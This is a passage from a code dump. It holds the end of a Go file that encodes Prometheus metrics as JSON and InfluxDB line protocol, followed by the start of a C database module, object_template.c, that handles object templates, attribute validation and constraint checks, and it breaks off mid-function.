Inf.\nfunc (j *JSON) Encode(mfs []*dto.MetricFamily) ([]byte, error) {\n\treturn EncodeJSON(mfs)\n}\n\n// DecodeJSON decodes a JSON array of metrics families.\nfunc DecodeJSON(r io.Reader) ([]*dto.MetricFamily, error) {\n\tdec := json.NewDecoder(r)\n\tfamilies := []*dto.MetricFamily{}\n\tfor {\n\t\tmfs := []*dto.MetricFamily{}\n\n\t\tif err := dec.Decode(&mfs); err == io.EOF {\n\t\t\tbreak\n\t\t} else if err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\tfamilies = append(families, mfs...)\n\t}\n\treturn families, nil\n}\n\n// EncodeJSON encodes the metric families to JSON.\nfunc EncodeJSON(mfs []*dto.MetricFamily) ([]byte, error) {\n\treturn json.Marshal(mfs)\n}\n\nconst (\n\t// just in case the definition of time.Nanosecond changes from 1.\n\tnsPerMilliseconds = int64(time.Millisecond / time.Nanosecond)\n)\n\n// LineProtocol encodes metric families into influxdb line protocol.\ntype LineProtocol struct{}\n\n// Encode encodes metrics into line protocol format bytes.\nfunc (l *LineProtocol) Encode(mfs []*dto.MetricFamily) ([]byte, error) {\n\treturn EncodeLineProtocol(mfs)\n}\n\n// EncodeLineProtocol converts prometheus metrics into line protocol.\nfunc EncodeLineProtocol(mfs []*dto.MetricFamily) ([]byte, error) {\n\tvar b bytes.Buffer\n\n\tpts := points(mfs)\n\tfor _, p := range pts {\n\t\tif _, err := b.WriteString(p.String()); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\tif err := b.WriteByte('\\n'); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t}\n\treturn b.Bytes(), nil\n}\n\nfunc points(mfs []*dto.MetricFamily) models.Points {\n\tpts := make(models.Points, 0, len(mfs))\n\tfor _, mf := range mfs {\n\t\tmts := make(models.Points, 0, len(mf.Metric))\n\t\tname := mf.GetName()\n\t\tfor _, m := range mf.Metric {\n\t\t\tts := tags(m.Label)\n\t\t\tfs := fields(mf.GetType(), m)\n\t\t\ttm := timestamp(m)\n\n\t\t\tpt, err := models.NewPoint(name, ts, fs, tm)\n\t\t\tif err != nil {\n\t\t\t\tcontinue\n\t\t\t}\n\t\t\tmts = append(mts, pt)\n\t\t}\n\t\tpts = append(pts, mts...)\n\t}\n\n\treturn pts\n}\n\nfunc timestamp(m *dto.Metric) time.Time {\n\tvar tm time.Time\n\tif m.GetTimestampMs() > 0 {\n\t\ttm = time.Unix(0, m.GetTimestampMs()*nsPerMilliseconds)\n\t}\n\treturn tm\n\n}\n\nfunc tags(labels []*dto.LabelPair) models.Tags {\n\tts := make(models.Tags, len(labels))\n\tfor i, label := range labels {\n\t\tts[i] = models.NewTag([]byte(label.GetName()), []byte(label.GetValue()))\n\t}\n\treturn ts\n}\n\nfunc fields(typ dto.MetricType, m *dto.Metric) models.Fields {\n\tswitch typ {\n\tcase dto.MetricType_SUMMARY:\n\t\treturn summary(m.GetSummary())\n\tcase dto.MetricType_HISTOGRAM:\n\t\treturn histogram(m.GetHistogram())\n\tcase dto.MetricType_GAUGE:\n\t\treturn value(\"gauge\", m.GetGauge())\n\tcase dto.MetricType_COUNTER:\n\t\treturn value(\"counter\", m.GetCounter())\n\tcase dto.MetricType_UNTYPED:\n\t\treturn value(\"value\", m.GetUntyped())\n\tdefault:\n\t\treturn nil\n\t}\n}\n\nfunc summary(s *dto.Summary) map[string]interface{} {\n\tfields := make(map[string]interface{}, len(s.Quantile)+2)\n\tfor _, q := range s.Quantile {\n\t\tv := q.GetValue()\n\t\tif !math.IsNaN(v) {\n\t\t\tkey := strconv.FormatFloat(q.GetQuantile(), 'f', -1, 64)\n\t\t\tfields[key] = v\n\t\t}\n\t}\n\n\tfields[\"count\"] = float64(s.GetSampleCount())\n\tfields[\"sum\"] = float64(s.GetSampleSum())\n\treturn fields\n}\n\nfunc histogram(hist *dto.Histogram) map[string]interface{} {\n\tfields := make(map[string]interface{}, len(hist.Bucket)+2)\n\tfor _, b := range hist.Bucket {\n\t\tk := strconv.FormatFloat(b.GetUpperBound(), 'f', -1, 64)\n\t\tfields[k] = float64(b.GetCumulativeCount())\n\t}\n\n\tfields[\"count\"] = float64(hist.GetSampleCount())\n\tfields[\"sum\"] = float64(hist.GetSampleSum())\n\n\treturn fields\n}\n\ntype valuer interface {\n\tGetValue() float64\n}\n\nfunc value(typ string, m valuer) models.Fields {\n\tvs := make(models.Fields, 1)\n\n\tv := m.GetValue()\n\tif !math.IsNaN(v) {\n\t\tvs[typ] = v\n\t}\n\n\treturn vs\n}\n"} {"text": "/*\n * Copyright (C) 2008 Search Solution Corporation. All rights reserved by Search Solution.\n *\n * This program is free software; you can redistribute it and/or modify\n * it under the terms of the GNU General Public License as published by\n * the Free Software Foundation; either version 2 of the License, or\n * (at your option) any later version.\n *\n * This program is distributed in the hope that it will be useful,\n * but WITHOUT ANY WARRANTY; without even the implied warranty of\n * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n * GNU General Public License for more details.\n *\n * You should have received a copy of the GNU General Public License\n * along with this program; if not, write to the Free Software\n * Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA\n *\n */\n\n/*\n * object_template.c - Object template module\n *\n * This contains code for attribute and method access, instance creation\n * and deletion, and misc utilitities related to instances.\n *\n */\n\n#ident \"$Id$\"\n\n#include \"config.h\"\n\n#include \n#include \n#include \n#include \n#include \n#include \n\n#include \"db.h\"\n#include \"dbtype.h\"\n#include \"error_manager.h\"\n#include \"system_parameter.h\"\n#include \"server_interface.h\"\n#include \"work_space.h\"\n#include \"object_domain.h\"\n#include \"object_primitive.h\"\n#include \"object_representation.h\"\n#include \"set_object.h\"\n#include \"class_object.h\"\n#include \"schema_manager.h\"\n#include \"object_accessor.h\"\n#include \"view_transform.h\"\n#include \"authenticate.h\"\n#include \"locator_cl.h\"\n#include \"virtual_object.h\"\n#include \"parser.h\"\n#include \"transaction_cl.h\"\n#include \"trigger_manager.h\"\n#include \"environment_variable.h\"\n#include \"transform.h\"\n#include \"execute_statement.h\"\n#include \"network_interface_cl.h\"\n\n#include \"dbtype.h\"\n\n#define OBJ_INTERNAL_SAVEPOINT_NAME \"*template-unique*\"\n\n/*\n * \t\t\tGLOBAL VARIABLES\n */\n/*\n * State used when creating templates, to indicate whether unique constraint\n * checking is enabled.\n * This state can be modifed using obt_enable_unique_checking()\n */\nbool obt_Check_uniques = true;\n\n/*\n * State variable used when creating object template, to indicate whether enable\n * auto increment feature\n */\nbool obt_Enable_autoincrement = true;\n\n/*\n * State variable used when generating AUTO_INCREMENT value,\n * to set the first generated AUTO_INCREMENT value as LAST_INSERT_ID.\n * It is only for client-side insertion.\n */\nbool obt_Last_insert_id_generated = false;\n\n/*\n * OBJECT MANAGER AREAS\n */\n\n/*\n * Template_area\n * Assignment_area\n *\n * Note :\n * Areas for the allocation of object templates and assignment\n * templates. Since these can be referenced by the interpreter,\n * we need to make sure that they serve as roots for the garbage\n * collector.\n *\n */\n\nstatic AREA *Template_area = NULL;\nstatic AREA *Assignment_area = NULL;\n\n/*\n * obj_Template_traversal\n *\n *\n */\n\nstatic unsigned int obj_Template_traversal = 0;\n/*\n * Must make sure template savepoints have unique names to allow for concurrent\n * or nested updates. Could be resetting this at db_restart() time.\n */\nstatic unsigned int template_savepoint_count = 0;\n\n\nstatic DB_VALUE *check_att_domain (SM_ATTRIBUTE * att, DB_VALUE * proposed_value);\nstatic int check_constraints (SM_ATTRIBUTE * att, DB_VALUE * value, unsigned force_check_not_null);\nstatic int quick_validate (SM_VALIDATION * valid, DB_VALUE * value);\nstatic void cache_validation (SM_VALIDATION * valid, DB_VALUE * value);\nstatic void begin_template_traversal (void);\nstatic OBJ_TEMPLATE *make_template (MOP object, MOP classobj);\nstatic int validate_template (OBJ_TEMPLATE * temp);\nstatic OBJ_TEMPASSIGN *obt_make_assignment (OBJ_TEMPLATE * template_ptr, SM_ATTRIBUTE * att);\nstatic void obt_free_assignment (OBJ_TEMPASSIGN * assign);\nstatic void obt_free_template (OBJ_TEMPLATE * template_ptr);\nstatic int populate_auto_increment (OBJ_TEMPLATE * template_ptr);\nstatic int populate_defaults (OBJ_TEMPLATE * template_ptr);\nstatic int obt_assign_obt (OBJ_TEMPLATE * template_ptr, SM_ATTRIBUTE * att, int base_assignment, OBJ_TEMPLATE * value);\nstatic MOP create_template_object (OBJ_TEMPLATE * template_ptr);\nstatic int access_object (OBJ_TEMPLATE * template_ptr, MOP * object, MOBJ * objptr);\nstatic int obt_convert_set_templates (SETREF * setref, int check_uniques);\nstatic int obt_final_check_set (SETREF * setref, int *has_uniques);\n\nstatic int obt_final_check (OBJ_TEMPLATE * template_ptr, int check_non_null, int *has_uniques);\nstatic int obt_apply_assignment (MOP op, SM_ATTRIBUTE * att, char *mem, DB_VALUE * value, int check_uniques);\nstatic int obt_apply_assignments (OBJ_TEMPLATE * template_ptr, int check_uniques, int level);\n\nstatic MOP make_temp_object (DB_OBJECT * class_, OBJ_TEMPLATE * object);\nstatic void free_temp_object (MOP obj);\n\n/*\n * obt_area_init\n * return: NO_ERROR or error code.\n *\n */\n\nint\nobt_area_init (void)\n{\n Template_area = area_create (\"Object templates\", sizeof (OBJ_TEMPLATE), 32);\n if (Template_area == NULL)\n {\n goto error;\n }\n\n Assignment_area = area_create (\"Assignment templates\", sizeof (OBJ_TEMPASSIGN), 64);\n if (Assignment_area == NULL)\n {\n goto error;\n }\n\n return NO_ERROR;\n\nerror:\n obt_area_final ();\n\n assert (er_errid () != NO_ERROR);\n\n return er_errid ();\n}\n\n/*\n * obt_area_final\n * return: NO_ERROR or error code.\n *\n */\nvoid\nobt_area_final (void)\n{\n if (Template_area != NULL)\n {\n area_destroy (Template_area);\n Template_area = NULL;\n }\n\n if (Assignment_area != NULL)\n {\n area_destroy (Assignment_area);\n Assignment_area = NULL;\n }\n}\n\n/*\n * obt_find_attribute - locate an attribute for a template.\n * return: error code\n * template(in) :\n * use_base_class(in) :\n * name(in): attribute name\n * attp(out): returned pointer to attribute descriptor\n *\n * Note:\n * This is a bit simpler than the others since we have the class\n * cached in the template.\n *\n */\n\nint\nobt_find_attribute (OBJ_TEMPLATE * template_ptr, int use_base_class, const char *name, SM_ATTRIBUTE ** attp)\n{\n int error = NO_ERROR;\n MOP classobj;\n SM_CLASS *class_, *upgrade_class;\n SM_ATTRIBUTE *att;\n\n att = NULL;\n\n class_ = (use_base_class) ? template_ptr->base_class : template_ptr->class_;\n\n att = classobj_find_attribute (class_, name, template_ptr->is_class_update);\n\n if (att != NULL && att->header.name_space == ID_SHARED_ATTRIBUTE)\n {\n /*\n * Sigh, when we originally fetched the class, it was fetched\n * with a read lock since we weren't sure of the intent. Now\n * that we know we're about to update a shared attribute, we need to\n * upgrade the lock to a write lock. We could use AU_FETCH_WRITE\n * here rather than AU_FETCH_UPDATE and use locator_update_class later\n * when we're sure the template can be applied without error.\n */\n if (!template_ptr->write_lock)\n\t{\n\t classobj = ((use_base_class) ? template_ptr->base_classobj : template_ptr->classobj);\n\n\t error = au_fetch_class (classobj, &upgrade_class, AU_FETCH_UPDATE, AU_ALTER);\n\t template_ptr->write_lock = !error;\n\n\t /*\n\t * This better damn well not re-fetch the class.\n\t * If this can happen, we'll need a general \"recache\" function\n\t * for the template.\n\t */\n\t if (class_ != upgrade_class)\n\t {\n\t error = ER_OBJ_TEMPLATE_INTERNAL;\n\t er_set (ER_ERROR_SEVERITY, ARG_FILE_LINE, error, 0);\n\t }\n\t}\n }\n\n if (error == NO_ERROR && att == NULL)\n {\n ERROR1 (error, ER_OBJ_INVALID_ATTRIBUTE, name);\n }\n\n *attp = att;\n return error;\n}\n\n/*\n *\n * ASSIGNMENT VALIDATION\n *\n *\n */\n\n/*\n * check_att_domain - This checks to see if a value is within the domain of an\n * attribute.\n *\n * returns: actual value container\n * att(in): attribute name (for error messages)\n * proposed_value(in): original value container\n *\n * Note:\n * It calls tp_domain_check & tp_domain_coerce to do the work, this\n * function mostly serves to inerpret the return codes and set an\n * appropriate error condition.\n *\n */\n\nstatic DB_VALUE *\ncheck_att_domain (SM_ATTRIBUTE * att, DB_VALUE * proposed_value)\n{\n TP_DOMAIN_STATUS status;\n DB_VALUE *value;\n int is_ref = 0;\n\n value = proposed_value;\n\n is_ref = pt_is_reference_to_reusable_oid (value);\n if (is_ref < 0)\n {\n return NULL;\n }\n if (is_ref > 0)\n {\n er_set (ER_ERROR_SEVERITY, ARG_FILE_LINE, ER_REFERENCE_TO_NON_REFERABLE_NOT_ALLOWED, 0);\n return NULL;\n }\n\n /*\n * Note that we set the \"exact\" match flag true to disallow \"tolerance\"\n * matches. Some types (such as CHAR) may appear to overflow the domain,\n * but can be truncated during the coercion process.\n */\n status = tp_domain_check (att->domain, value, TP_EXACT_MATCH);\n\n if (status != DOMAIN_COMPATIBLE)\n {\n value = pr_make_ext_value ();\n if (value == NULL)\n\t{\n\t return NULL;\n\t}\n status = tp_value_cast (proposed_value, value, att->domain, !TP_IS_CHAR_TYPE (TP_DOMAIN_TYPE (att->domain)));\n if (status != DOMAIN_COMPATIBLE)\n\t{\n\t (void) pr_free_ext_value (value);\n\t}\n }\n\n if (status != DOMAIN_COMPATIBLE)\n {\n switch (status)\n\t{\n\tcase DOMAIN_ERROR:\n\t /* error has already been set */\n\t break;\n\tcase DOMAIN_OVERFLOW:\n\t if (TP_IS_BIT_TYPE (DB_VALUE_DOMAIN_TYPE (proposed_value)))\n\t {\n\t er_set (ER_ERROR_SEVERITY, ARG_FILE_LINE, ER_OBJ_STRING_OVERFLOW, 2, att->header.name,\n\t\t att->domain->precision);\n\t }\n\t else\n\t {\n\t (void) tp_domain_status_er_set (status, ARG_FILE_LINE, proposed_value, att->domain);\n\t assert (er_errid () != NO_ERROR);\n\t }\n\t break;\n\tcase DOMAIN_INCOMPATIBLE:\n\tdefault:\n\t /*\n\t * the default case shouldn't really be encountered, might want to\n\t * signal a different error. The OVERFLOW case should only\n\t * be returned during coercion which wasn't requested, to be safe,\n\t * treat these like a domain conflict. Probably need a more generic\n\t * domain conflict error that uses full printed representations\n\t * of the entire domain.\n\t */\n\t er_set (ER_ERROR_SEVERITY, ARG_FILE_LINE, ER_OBJ_DOMAIN_CONFLICT, 1, att->header.name);\n\t break;\n\t}\n\n /* return NULL if incompatible */\n value = NULL;\n }\n\n return value;\n}\n\n/*\n * check_constraints - This function is used to check a proposed value\n * against the integrity constraints defined\n * for an attribute.\n *\n * returns: error code\n *\n * att(in): attribute descriptor\n * value(in): value to verify\n * force_check_not_null(in): force NOT NULL constraint check\n *\n * Note:\n * If will return an error code if any of the constraints are violated.\n *\n */\n\nstatic int\ncheck_constraints (SM_ATTRIBUTE * att, DB_VALUE * value, unsigned force_check_not_null)\n{\n int error = NO_ERROR;\n MOP mop;\n\n /* check NOT NULL constraint */\n if (value == NULL || DB_IS_NULL (value)\n || (att->domain->type == tp_Type_object && (mop = db_get_object (value)) && WS_MOP_IS_NULL (mop)))\n {\n if (att->flags & SM_ATTFLAG_NON_NULL)\n\t{\n\t if ((att->flags & SM_ATTFLAG_AUTO_INCREMENT) && !force_check_not_null)\n\t {\n\t assert (DB_IS_NULL (value));\n\t assert (att->domain->type != tp_Type_object);\n\n\t /* This is allowed to happen only during INSERT statements, since the next serial value will be filled in\n\t * at a later time. For other cases, the force_check_not_null flag should be set. */\n\t }\n\t else\n\t {\n\t ERROR1 (error, ER_OBJ_ATTRIBUTE_CANT_BE_NULL, att->header.name);\n\t }\n\t}\n }\n else\n {\n /* Check size constraints */\n if (tp_check_value_size (att->domain, value) != DOMAIN_COMPATIBLE)\n\t{\n\t /* probably need an error message that isn't specific to \"string\" types */\n\t ERROR2 (error, ER_OBJ_STRING_OVERFLOW, att->header.name, att->domain->precision);\n\t}\n }\n\n return error;\n}\n\n/*\n * quick_validate - This function is where we try to determine as fast as\n * possible if a value is compatible with\n * a certain attribute's domain.\n * returns: non-zero if the value is known to be valid\n * valid(in): validation cache\n * value(in): value to ponder\n */\n\nstatic int\nquick_validate (SM_VALIDATION * valid, DB_VALUE * value)\n{\n int is_valid;\n DB_TYPE type;\n\n if (valid == NULL || value == NULL)\n return 0;\n\n is_valid = 0;\n type = DB_VALUE_TYPE (value);\n\n switch (type)\n {\n case DB_TYPE_OBJECT:\n {\n\tDB_OBJECT *obj, *class_;\n\n\tobj = db_get_object (value);\n\tif (obj != NULL)\n\t {\n\t class_ = db_get_class (obj);\n\t if (class_ != NULL)\n\t {\n\t\tif (class_ == valid->last_class)\n\t\t {\n\t\t is_valid = 1;\n\t\t }\n\t\telse\n\t\t {\n\t\t /* wasn't on the first level cache, check the list */\n\t\t is_valid = ml_find (valid->validated_classes, class_);\n\t\t /* if its on the list, auto select this for the next time around */\n\t\t if (is_valid)\n\t\t {\n\t\t\tvalid->last_class = class_;\n\t\t }\n\t\t }\n\t }\n\t }\n }\n break;\n\n case DB_TYPE_SET:\n case DB_TYPE_MULTISET:\n case DB_TYPE_SEQUENCE:\n {\n\tDB_SET *set;\n\tDB_DOMAIN *domain;\n\n\tset = db_get_set (value);\n\tdomain = set_get_domain (set);\n\tif (domain == valid->last_setdomain)\n\t {\n\t is_valid = 1;\n\t }\n }\n break;\n\n case DB_TYPE_CHAR:\n case DB_TYPE_NCHAR:\n case DB_TYPE_VARCHAR:\n case DB_TYPE_VARNCHAR:\n if (type == valid->last_type && DB_GET_STRING_PRECISION (value) == valid->last_precision)\n\t{\n\t is_valid = 1;\n\t}\n break;\n\n case DB_TYPE_BIT:\n case DB_TYPE_VARBIT:\n if (type == valid->last_type && DB_GET_BIT_PRECISION (value) == valid->last_precision)\n\t{\n\t is_valid = 1;\n\t}\n break;\n\n case DB_TYPE_NUMERIC:\n if (type == valid->last_type && DB_GET_NUMERIC_PRECISION (value) == valid->last_precision\n\t && DB_GET_NUMERIC_SCALE (value) == valid->last_scale)\n\t{\n\t is_valid = 1;\n\t}\n break;\n\n default:\n if (type == valid->last_type)\n\t{\n\t is_valid = 1;\n\t}\n break;\n }\n\n return is_valid;\n}\n\n/*\n * cache_validation\n * return : none\n * valid(in): validation cache\n * value(in): value known to be good\n *\n * Note:\n * Caches information about the data value in the validation cache\n * so hopefully we'll be quicker about validating values of this\n * form if we find them again.\n *\n */\n\nstatic void\ncache_validation (SM_VALIDATION * valid, DB_VALUE * value)\n{\n DB_TYPE type;\n\n if (valid == NULL || value == NULL)\n {\n return;\n }\n\n type = DB_VALUE_TYPE (value);\n switch (type)\n {\n case DB_TYPE_OBJECT:\n {\n\tDB_OBJECT *obj, *class_;\n\n\tobj = db_get_object (value);\n\tif (obj != NULL)\n\t {\n\t class_ = db_get_class (obj);\n\t if (class_ != NULL)\n\t {\n\t\tvalid->last_class = class_;\n\t\t/*\n\t\t * !! note that we have to be building an external object list\n\t\t * here so these serve as GC roots. This is kludgey, we should\n\t\t * be encapsulating structure rules inside cl_ where the\n\t\t * SM_VALIDATION is allocated.\n\t\t */\n\t\t(void) ml_ext_add (&valid->validated_classes, class_, NULL);\n\t }\n\t }\n }\n break;\n\n case DB_TYPE_SET:\n case DB_TYPE_MULTISET:\n case DB_TYPE_SEQUENCE:\n {\n\tDB_SET *set;\n\n\tset = db_get_set (value);\n\tvalid->last_setdomain = set_get_domain (set);\n }\n break;\n\n case DB_TYPE_CHAR:\n case DB_TYPE_NCHAR:\n case DB_TYPE_VARCHAR:\n case DB_TYPE_VARNCHAR:\n case DB_TYPE_BIT:\n case DB_TYPE_VARBIT:\n valid->last_type = type;\n valid->last_precision = db_value_precision (value);\n valid->last_scale = 0;\n break;\n\n case DB_TYPE_NUMERIC:\n valid->last_type = type;\n valid->last_precision = db_value_precision (value);\n valid->last_scale = db_value_scale (value);\n break;\n\n default:\n valid->last_type = type;\n valid->last_precision = 0;\n valid->last_scale = 0;\n break;\n }\n}\n\n/*\n * obt_check_assignment - This is the main validation routine\n * for attribute assignment.\n * returns: value container\n * att(in): attribute descriptor\n * proposed_value(in): value to assign\n * valid(in):\n * force_check_not_null(in): force check for NOT NULL\n * constraints\n *\n *\n * Note:\n * It is used both by the direct assignment function obj_set and also\n * by object templates (which do grouped assignments). Any other function\n * that does attribute value assignment should also use this function\n * or be VERY careful about the rules contained here.\n * The check_unique flag is normally turned on only if we're building\n * an object template because we have to check for constraint violation\n * before allowing the rest of the template to be built. For immediate\n * attribute assignment (not using templates) we delay the checking for\n * unique constraints until later (in assign_value) so we only have to\n * do one server call instead of two. Would be nice if templates could\n * have a way to \"batch up\" their unique attribute checks.\n * This function will return NULL if an error was detected.\n * It will return the propsed_value pointer if the assignment is\n * acceptable.\n * It will return a new value container if the proposed_value wasn't\n * acceptable but it was coerceable to a valid value.\n * The caller must check to see if the returned value is different\n * and if so free it with pr_free_ext_value() when done.\n *\n */\n\nDB_VALUE *\nobt_check_assignment (SM_ATTRIBUTE * att, DB_VALUE * proposed_value, SM_VALIDATION * valid,\n\t\t unsigned force_check_not_null)\n{\n DB_VALUE *value;\n\n /* assume this will be ok */\n value = proposed_value;\n\n /* for simplicity, convert this into a container with a NULL type */\n if (value == NULL)\n {\n value = pr_make_ext_value ();\n }\n else\n {\n /*\n * before we make the expensive checks, see if we've got some cached\n * validation information handy\n */\n if (!quick_validate (valid, value))\n\t{\n\t value = check_att_domain (att, proposed_value);\n\t if (value != NULL)\n\t {\n\t if (check_constraints (att, value, force_check_not_null) != NO_ERROR)\n\t\t{\n\t\t if (value != proposed_value)\n\t\t {\n\t\t (void) pr_free_ext_value (value);\n\t\t }\n\t\t value = NULL;\n\t\t}\n\t else\n\t\t{\n\t\t /*\n\t\t * we're ok, if there was no coercion required, remember this for\n\t\t * next time.\n\t\t */\n\t\t if (value == proposed_value)\n\t\t {\n\t\t cache_validation (valid, proposed_value);\n\t\t }\n\t\t}\n\t }\n\t}\n }\n\n return value;\n}\n\n/*\n *\n * OBJECT TEMPLATE ASSIGNMENT\n *\n *\n */\n\n\n/*\n * begin_template_traversal - This \"allocates\" the traversal counter\n * for a new template traversal.\n * return : none\n *\n * Note :\n * obj_Template_traversal is set to this value so it can\n * be tested during traversal.\n * This is in a function just so that the rules for skipping a traversal\n * value of zero can be encapsulated.\n *\n */\n\nstatic void\nbegin_template_traversal (void)\n{\n /* increment the counter */\n obj_Template_traversal++;\n\n /* don't let it be zero */\n if (obj_Template_traversal == 0)\n {\n obj_Template_traversal++;\n }\n}\n\n/*\n * make_template - This initializes a new object template.\n * return: new object template\n * object(in): the object that the template is being created for\n * classobj(in): the class of the object\n *\n */\n\nstatic OBJ_TEMPLATE *\nmake_template (MOP object, MOP classobj)\n{\n OBJ_TEMPLATE *template_ptr;\n AU_FETCHMODE mode;\n AU_TYPE auth;\n SM_CLASS *class_, *base_class;\n MOP base_classobj, base_object;\n MOBJ obj;\n OBJ_TEMPASSIGN **vec;\n\n base_classobj = NULL;\n base_class = NULL;\n base_object = NULL;\n\n /* fetch & lock the class with the appropriate options */\n mode = AU_FETCH_READ;\n if (object == NULL)\n {\n auth = AU_INSERT;\n }\n else if (object != classobj)\n {\n auth = AU_UPDATE;\n }\n else\n {\n /*\n * class variable update\n * NOTE: It might be good to use AU_FETCH_WRITE here and then\n * use locator_update_class to set the dirty bit after the template\n * has been successfully applied.\n */\n mode = AU_FETCH_UPDATE;\n auth = AU_ALTER;\n }\n\n if (au_fetch_class (classobj, &class_, mode, auth))\n {\n return NULL;\n }\n\n\n /*\n * we only need to keep track of the base class if this is a\n * virtual class, for proxies, the instances look like usual\n */\n\n if (class_->class_type == SM_VCLASS_CT\t/* a view, and... */\n && object != classobj /* we are not doing a meta class update */ )\n {\n /*\n * could use vid_is_updatable() if\n * the instance was supplied but since this can be NULL for\n * insert templates, use mq_is_updatable on the class object instead.\n * NOTE: Don't call this yet, try to use mq_fetch_one_real_class()\n * to perform the updatability test.\n */\n if (!mq_is_updatable (classobj))\n\t{\n\t er_set (ER_ERROR_SEVERITY, ARG_FILE_LINE, ER_IT_NOT_UPDATABLE_STMT, 0);\n\t return NULL;\n\t}\n\n\n base_classobj = mq_fetch_one_real_class (classobj);\n if (base_classobj == NULL)\n\t{\n\t er_set (ER_ERROR_SEVERITY, ARG_FILE_LINE, ER_IT_NOT_UPDATABLE_STMT, 0);\n\t return NULL;\n\t}\n\n if (au_fetch_class (base_classobj, &base_class, AU_FETCH_READ, auth))\n\t{\n\t return NULL;\n\t}\n\n /* get the associated base object (if this isn't a proxy) */\n if (object != NULL && !vid_is_base_instance (object))\n\t{\n\t base_object = vid_get_referenced_mop (object);\n\t}\n }\n\n /*\n * If this is an instance update, fetch & lock the instance.\n * NOTE: It might be good to use AU_FETCH_WRITE and use locator_update_instance\n * to set the dirty bit after the template has been successfully applied.\n *\n * If this is a virtual instance on a non-proxy, could be locking\n * the associated instance as well. Is this already being done ?\n */\n if (object != NULL && object != classobj)\n {\n if (au_fetch_instance (object, &obj, AU_FETCH_UPDATE, LC_FETCH_MVCC_VERSION, AU_UPDATE))\n\t{\n\t return NULL;\n\t}\n\n /*\n * Could cache the object memory pointer this in the template as\n * well but that would require that it be pinned for a long\n * duration through code that we don't control. Dangerous.\n */\n }\n\n template_ptr = (OBJ_TEMPLATE *) area_alloc (Template_area);\n if (template_ptr != NULL)\n {\n template_ptr->object = object;\n template_ptr->classobj = classobj;\n\n /*\n * cache the class info directly in the template, will need\n * to remember the transaction id and chn for validation\n */\n template_ptr->class_ = class_;\n\n /* cache the base class if this is a virtual class template */\n template_ptr->base_classobj = base_classobj;\n template_ptr->base_class = base_class;\n template_ptr->base_object = base_object;\n\n template_ptr->tran_id = tm_Tran_index;\n template_ptr->schema_id = sm_local_schema_version ();\n template_ptr->assignments = NULL;\n template_ptr->label = NULL;\n template_ptr->traversal = 0;\n template_ptr->write_lock = mode != AU_FETCH_READ;\n template_ptr->traversed = 0;\n template_ptr->is_old_template = 0;\n template_ptr->is_class_update = (object == classobj);\n template_ptr->check_uniques = obt_Check_uniques;\n if (TM_TRAN_ISOLATION () >= TRAN_REPEATABLE_READ)\n\t{\n\t template_ptr->check_serializable_conflict = 1;\n\t}\n else\n\t{\n\t template_ptr->check_serializable_conflict = 0;\n\t}\n template_ptr->uniques_were_modified = 0;\n template_ptr->function_key_modified = 0;\n\n template_ptr->shared_was_modified = 0;\n template_ptr->discard_on_finish = 1;\n template_ptr->fkeys_were_modified = 0;\n template_ptr->force_check_not_null = 0;\n template_ptr->force_flush = 0;\n template_ptr->is_autoincrement_set = 0;\n template_ptr->pruning_type = DB_NOT_PARTITIONED_CLASS;\n /*\n * Don't do this until we've initialized the other stuff;\n * OTMPL_NASSIGNS relies on the \"class\" attribute of the template.\n */\n\n if (template_ptr->is_class_update)\n\t{\n\t template_ptr->nassigns = template_ptr->class_->class_attribute_count;\n\t}\n else\n\t{\n\t template_ptr->nassigns = (template_ptr->class_->att_count + template_ptr->class_->shared_count);\n\t}\n\n vec = NULL;\n if (template_ptr->nassigns)\n\t{\n\t int i;\n\n\t vec = (OBJ_TEMPASSIGN **) malloc (template_ptr->nassigns * sizeof (OBJ_TEMPASSIGN *));\n\t if (!vec)\n\t {\n\t return NULL;\n\t }\n\t for (i = 0; i < template_ptr->nassigns; i++)\n\t {\n\t vec[i] = NULL;\n\t }\n\t}\n\n template_ptr->assignments = vec;\n }\n\n return template_ptr;\n}\n\n/*\n * validate_template - This is used to validate a template before each operation\n * return: error code\n * temp(in): template to validate\n *\n */\n\nstatic int\nvalidate_template (OBJ_TEMPLATE * temp)\n{\n int error = NO_ERROR;\n\n if (temp != NULL && (temp->tran_id != tm_Tran_index || temp->schema_id != sm_local_schema_version ()))\n {\n error = ER_OBJ_INVALID_TEMPLATE;\n er_set (ER_ERROR_SEVERITY, ARG_FILE_LINE, error, 0);\n }\n\n return error;\n}\n\n/*\n * obt_make_assignment - This initializes a new assignment template.\n * return: template assignment structure\n * template(in):\n * att(in):\n *\n * Note:\n * It also adds it to a containing template.\n */\n\nstatic OBJ_TEMPASSIGN *\nobt_make_assignment (OBJ_TEMPLATE * template_ptr, SM_ATTRIBUTE * att)\n{\n OBJ_TEMPASSIGN *assign;\n\n assign = (OBJ_TEMPASSIGN *) area_alloc (Assignment_area);\n if (assign != NULL)\n {\n assign->obj = NULL;\n assign->variable = NULL;\n assign->att = att;\n assign->old_value = NULL;\n assign->is_default = 0;\n assign->is_auto_increment = 0;\n\n template_ptr->assignments[att->order] = assign;\n if (classobj_has_unique_constraint (att->constraints))\n\t{\n\t template_ptr->uniques_were_modified = 1;\n\t}\n if (att->header.name_space == ID_SHARED_ATTRIBUTE)\n\t{\n\t template_ptr->shared_was_modified = 1;\n\t}\n\n if (classobj_get_cached_constraint (att->constraints, SM_CONSTRAINT_FOREIGN_KEY, NULL))\n\t{\n\t template_ptr->fkeys_were_modified = 1;\n\t}\n if (classobj_has_function_constraint (att->constraints))\n\t{\n\t template_ptr->function_key_modified = 1;\n\t}\n }\n\n return assign;\n}\n\n/*\n * obt_free_assignment - Work function for obt_free_template.\n * return: none\n * assign(in): an assignment template\n *\n * Note :\n * Frees an attribute assignment template. If the assigment contains\n * an object template rather than a DB_VALUE, it will be freed by\n * recursively calling obj_free_template.\n *\n */\n\nstatic void\nobt_free_assignment (OBJ_TEMPASSIGN * assign)\n{\n DB_VALUE *value = NULL;\n SETREF *setref;\n int i, set_size;\n\n if (assign != NULL)\n {\n if (assign->variable != NULL)\n\t{\n\n\t DB_TYPE av_type;\n\n\t /* check for nested templates */\n\t av_type = DB_VALUE_TYPE (assign->variable);\n\t if (av_type == DB_TYPE_POINTER)\n\t {\n\t obt_free_template ((OBJ_TEMPLATE *) db_get_pointer (assign->variable));\n\t db_make_pointer (assign->variable, NULL);\n\t }\n\t else if (TP_IS_SET_TYPE (av_type) 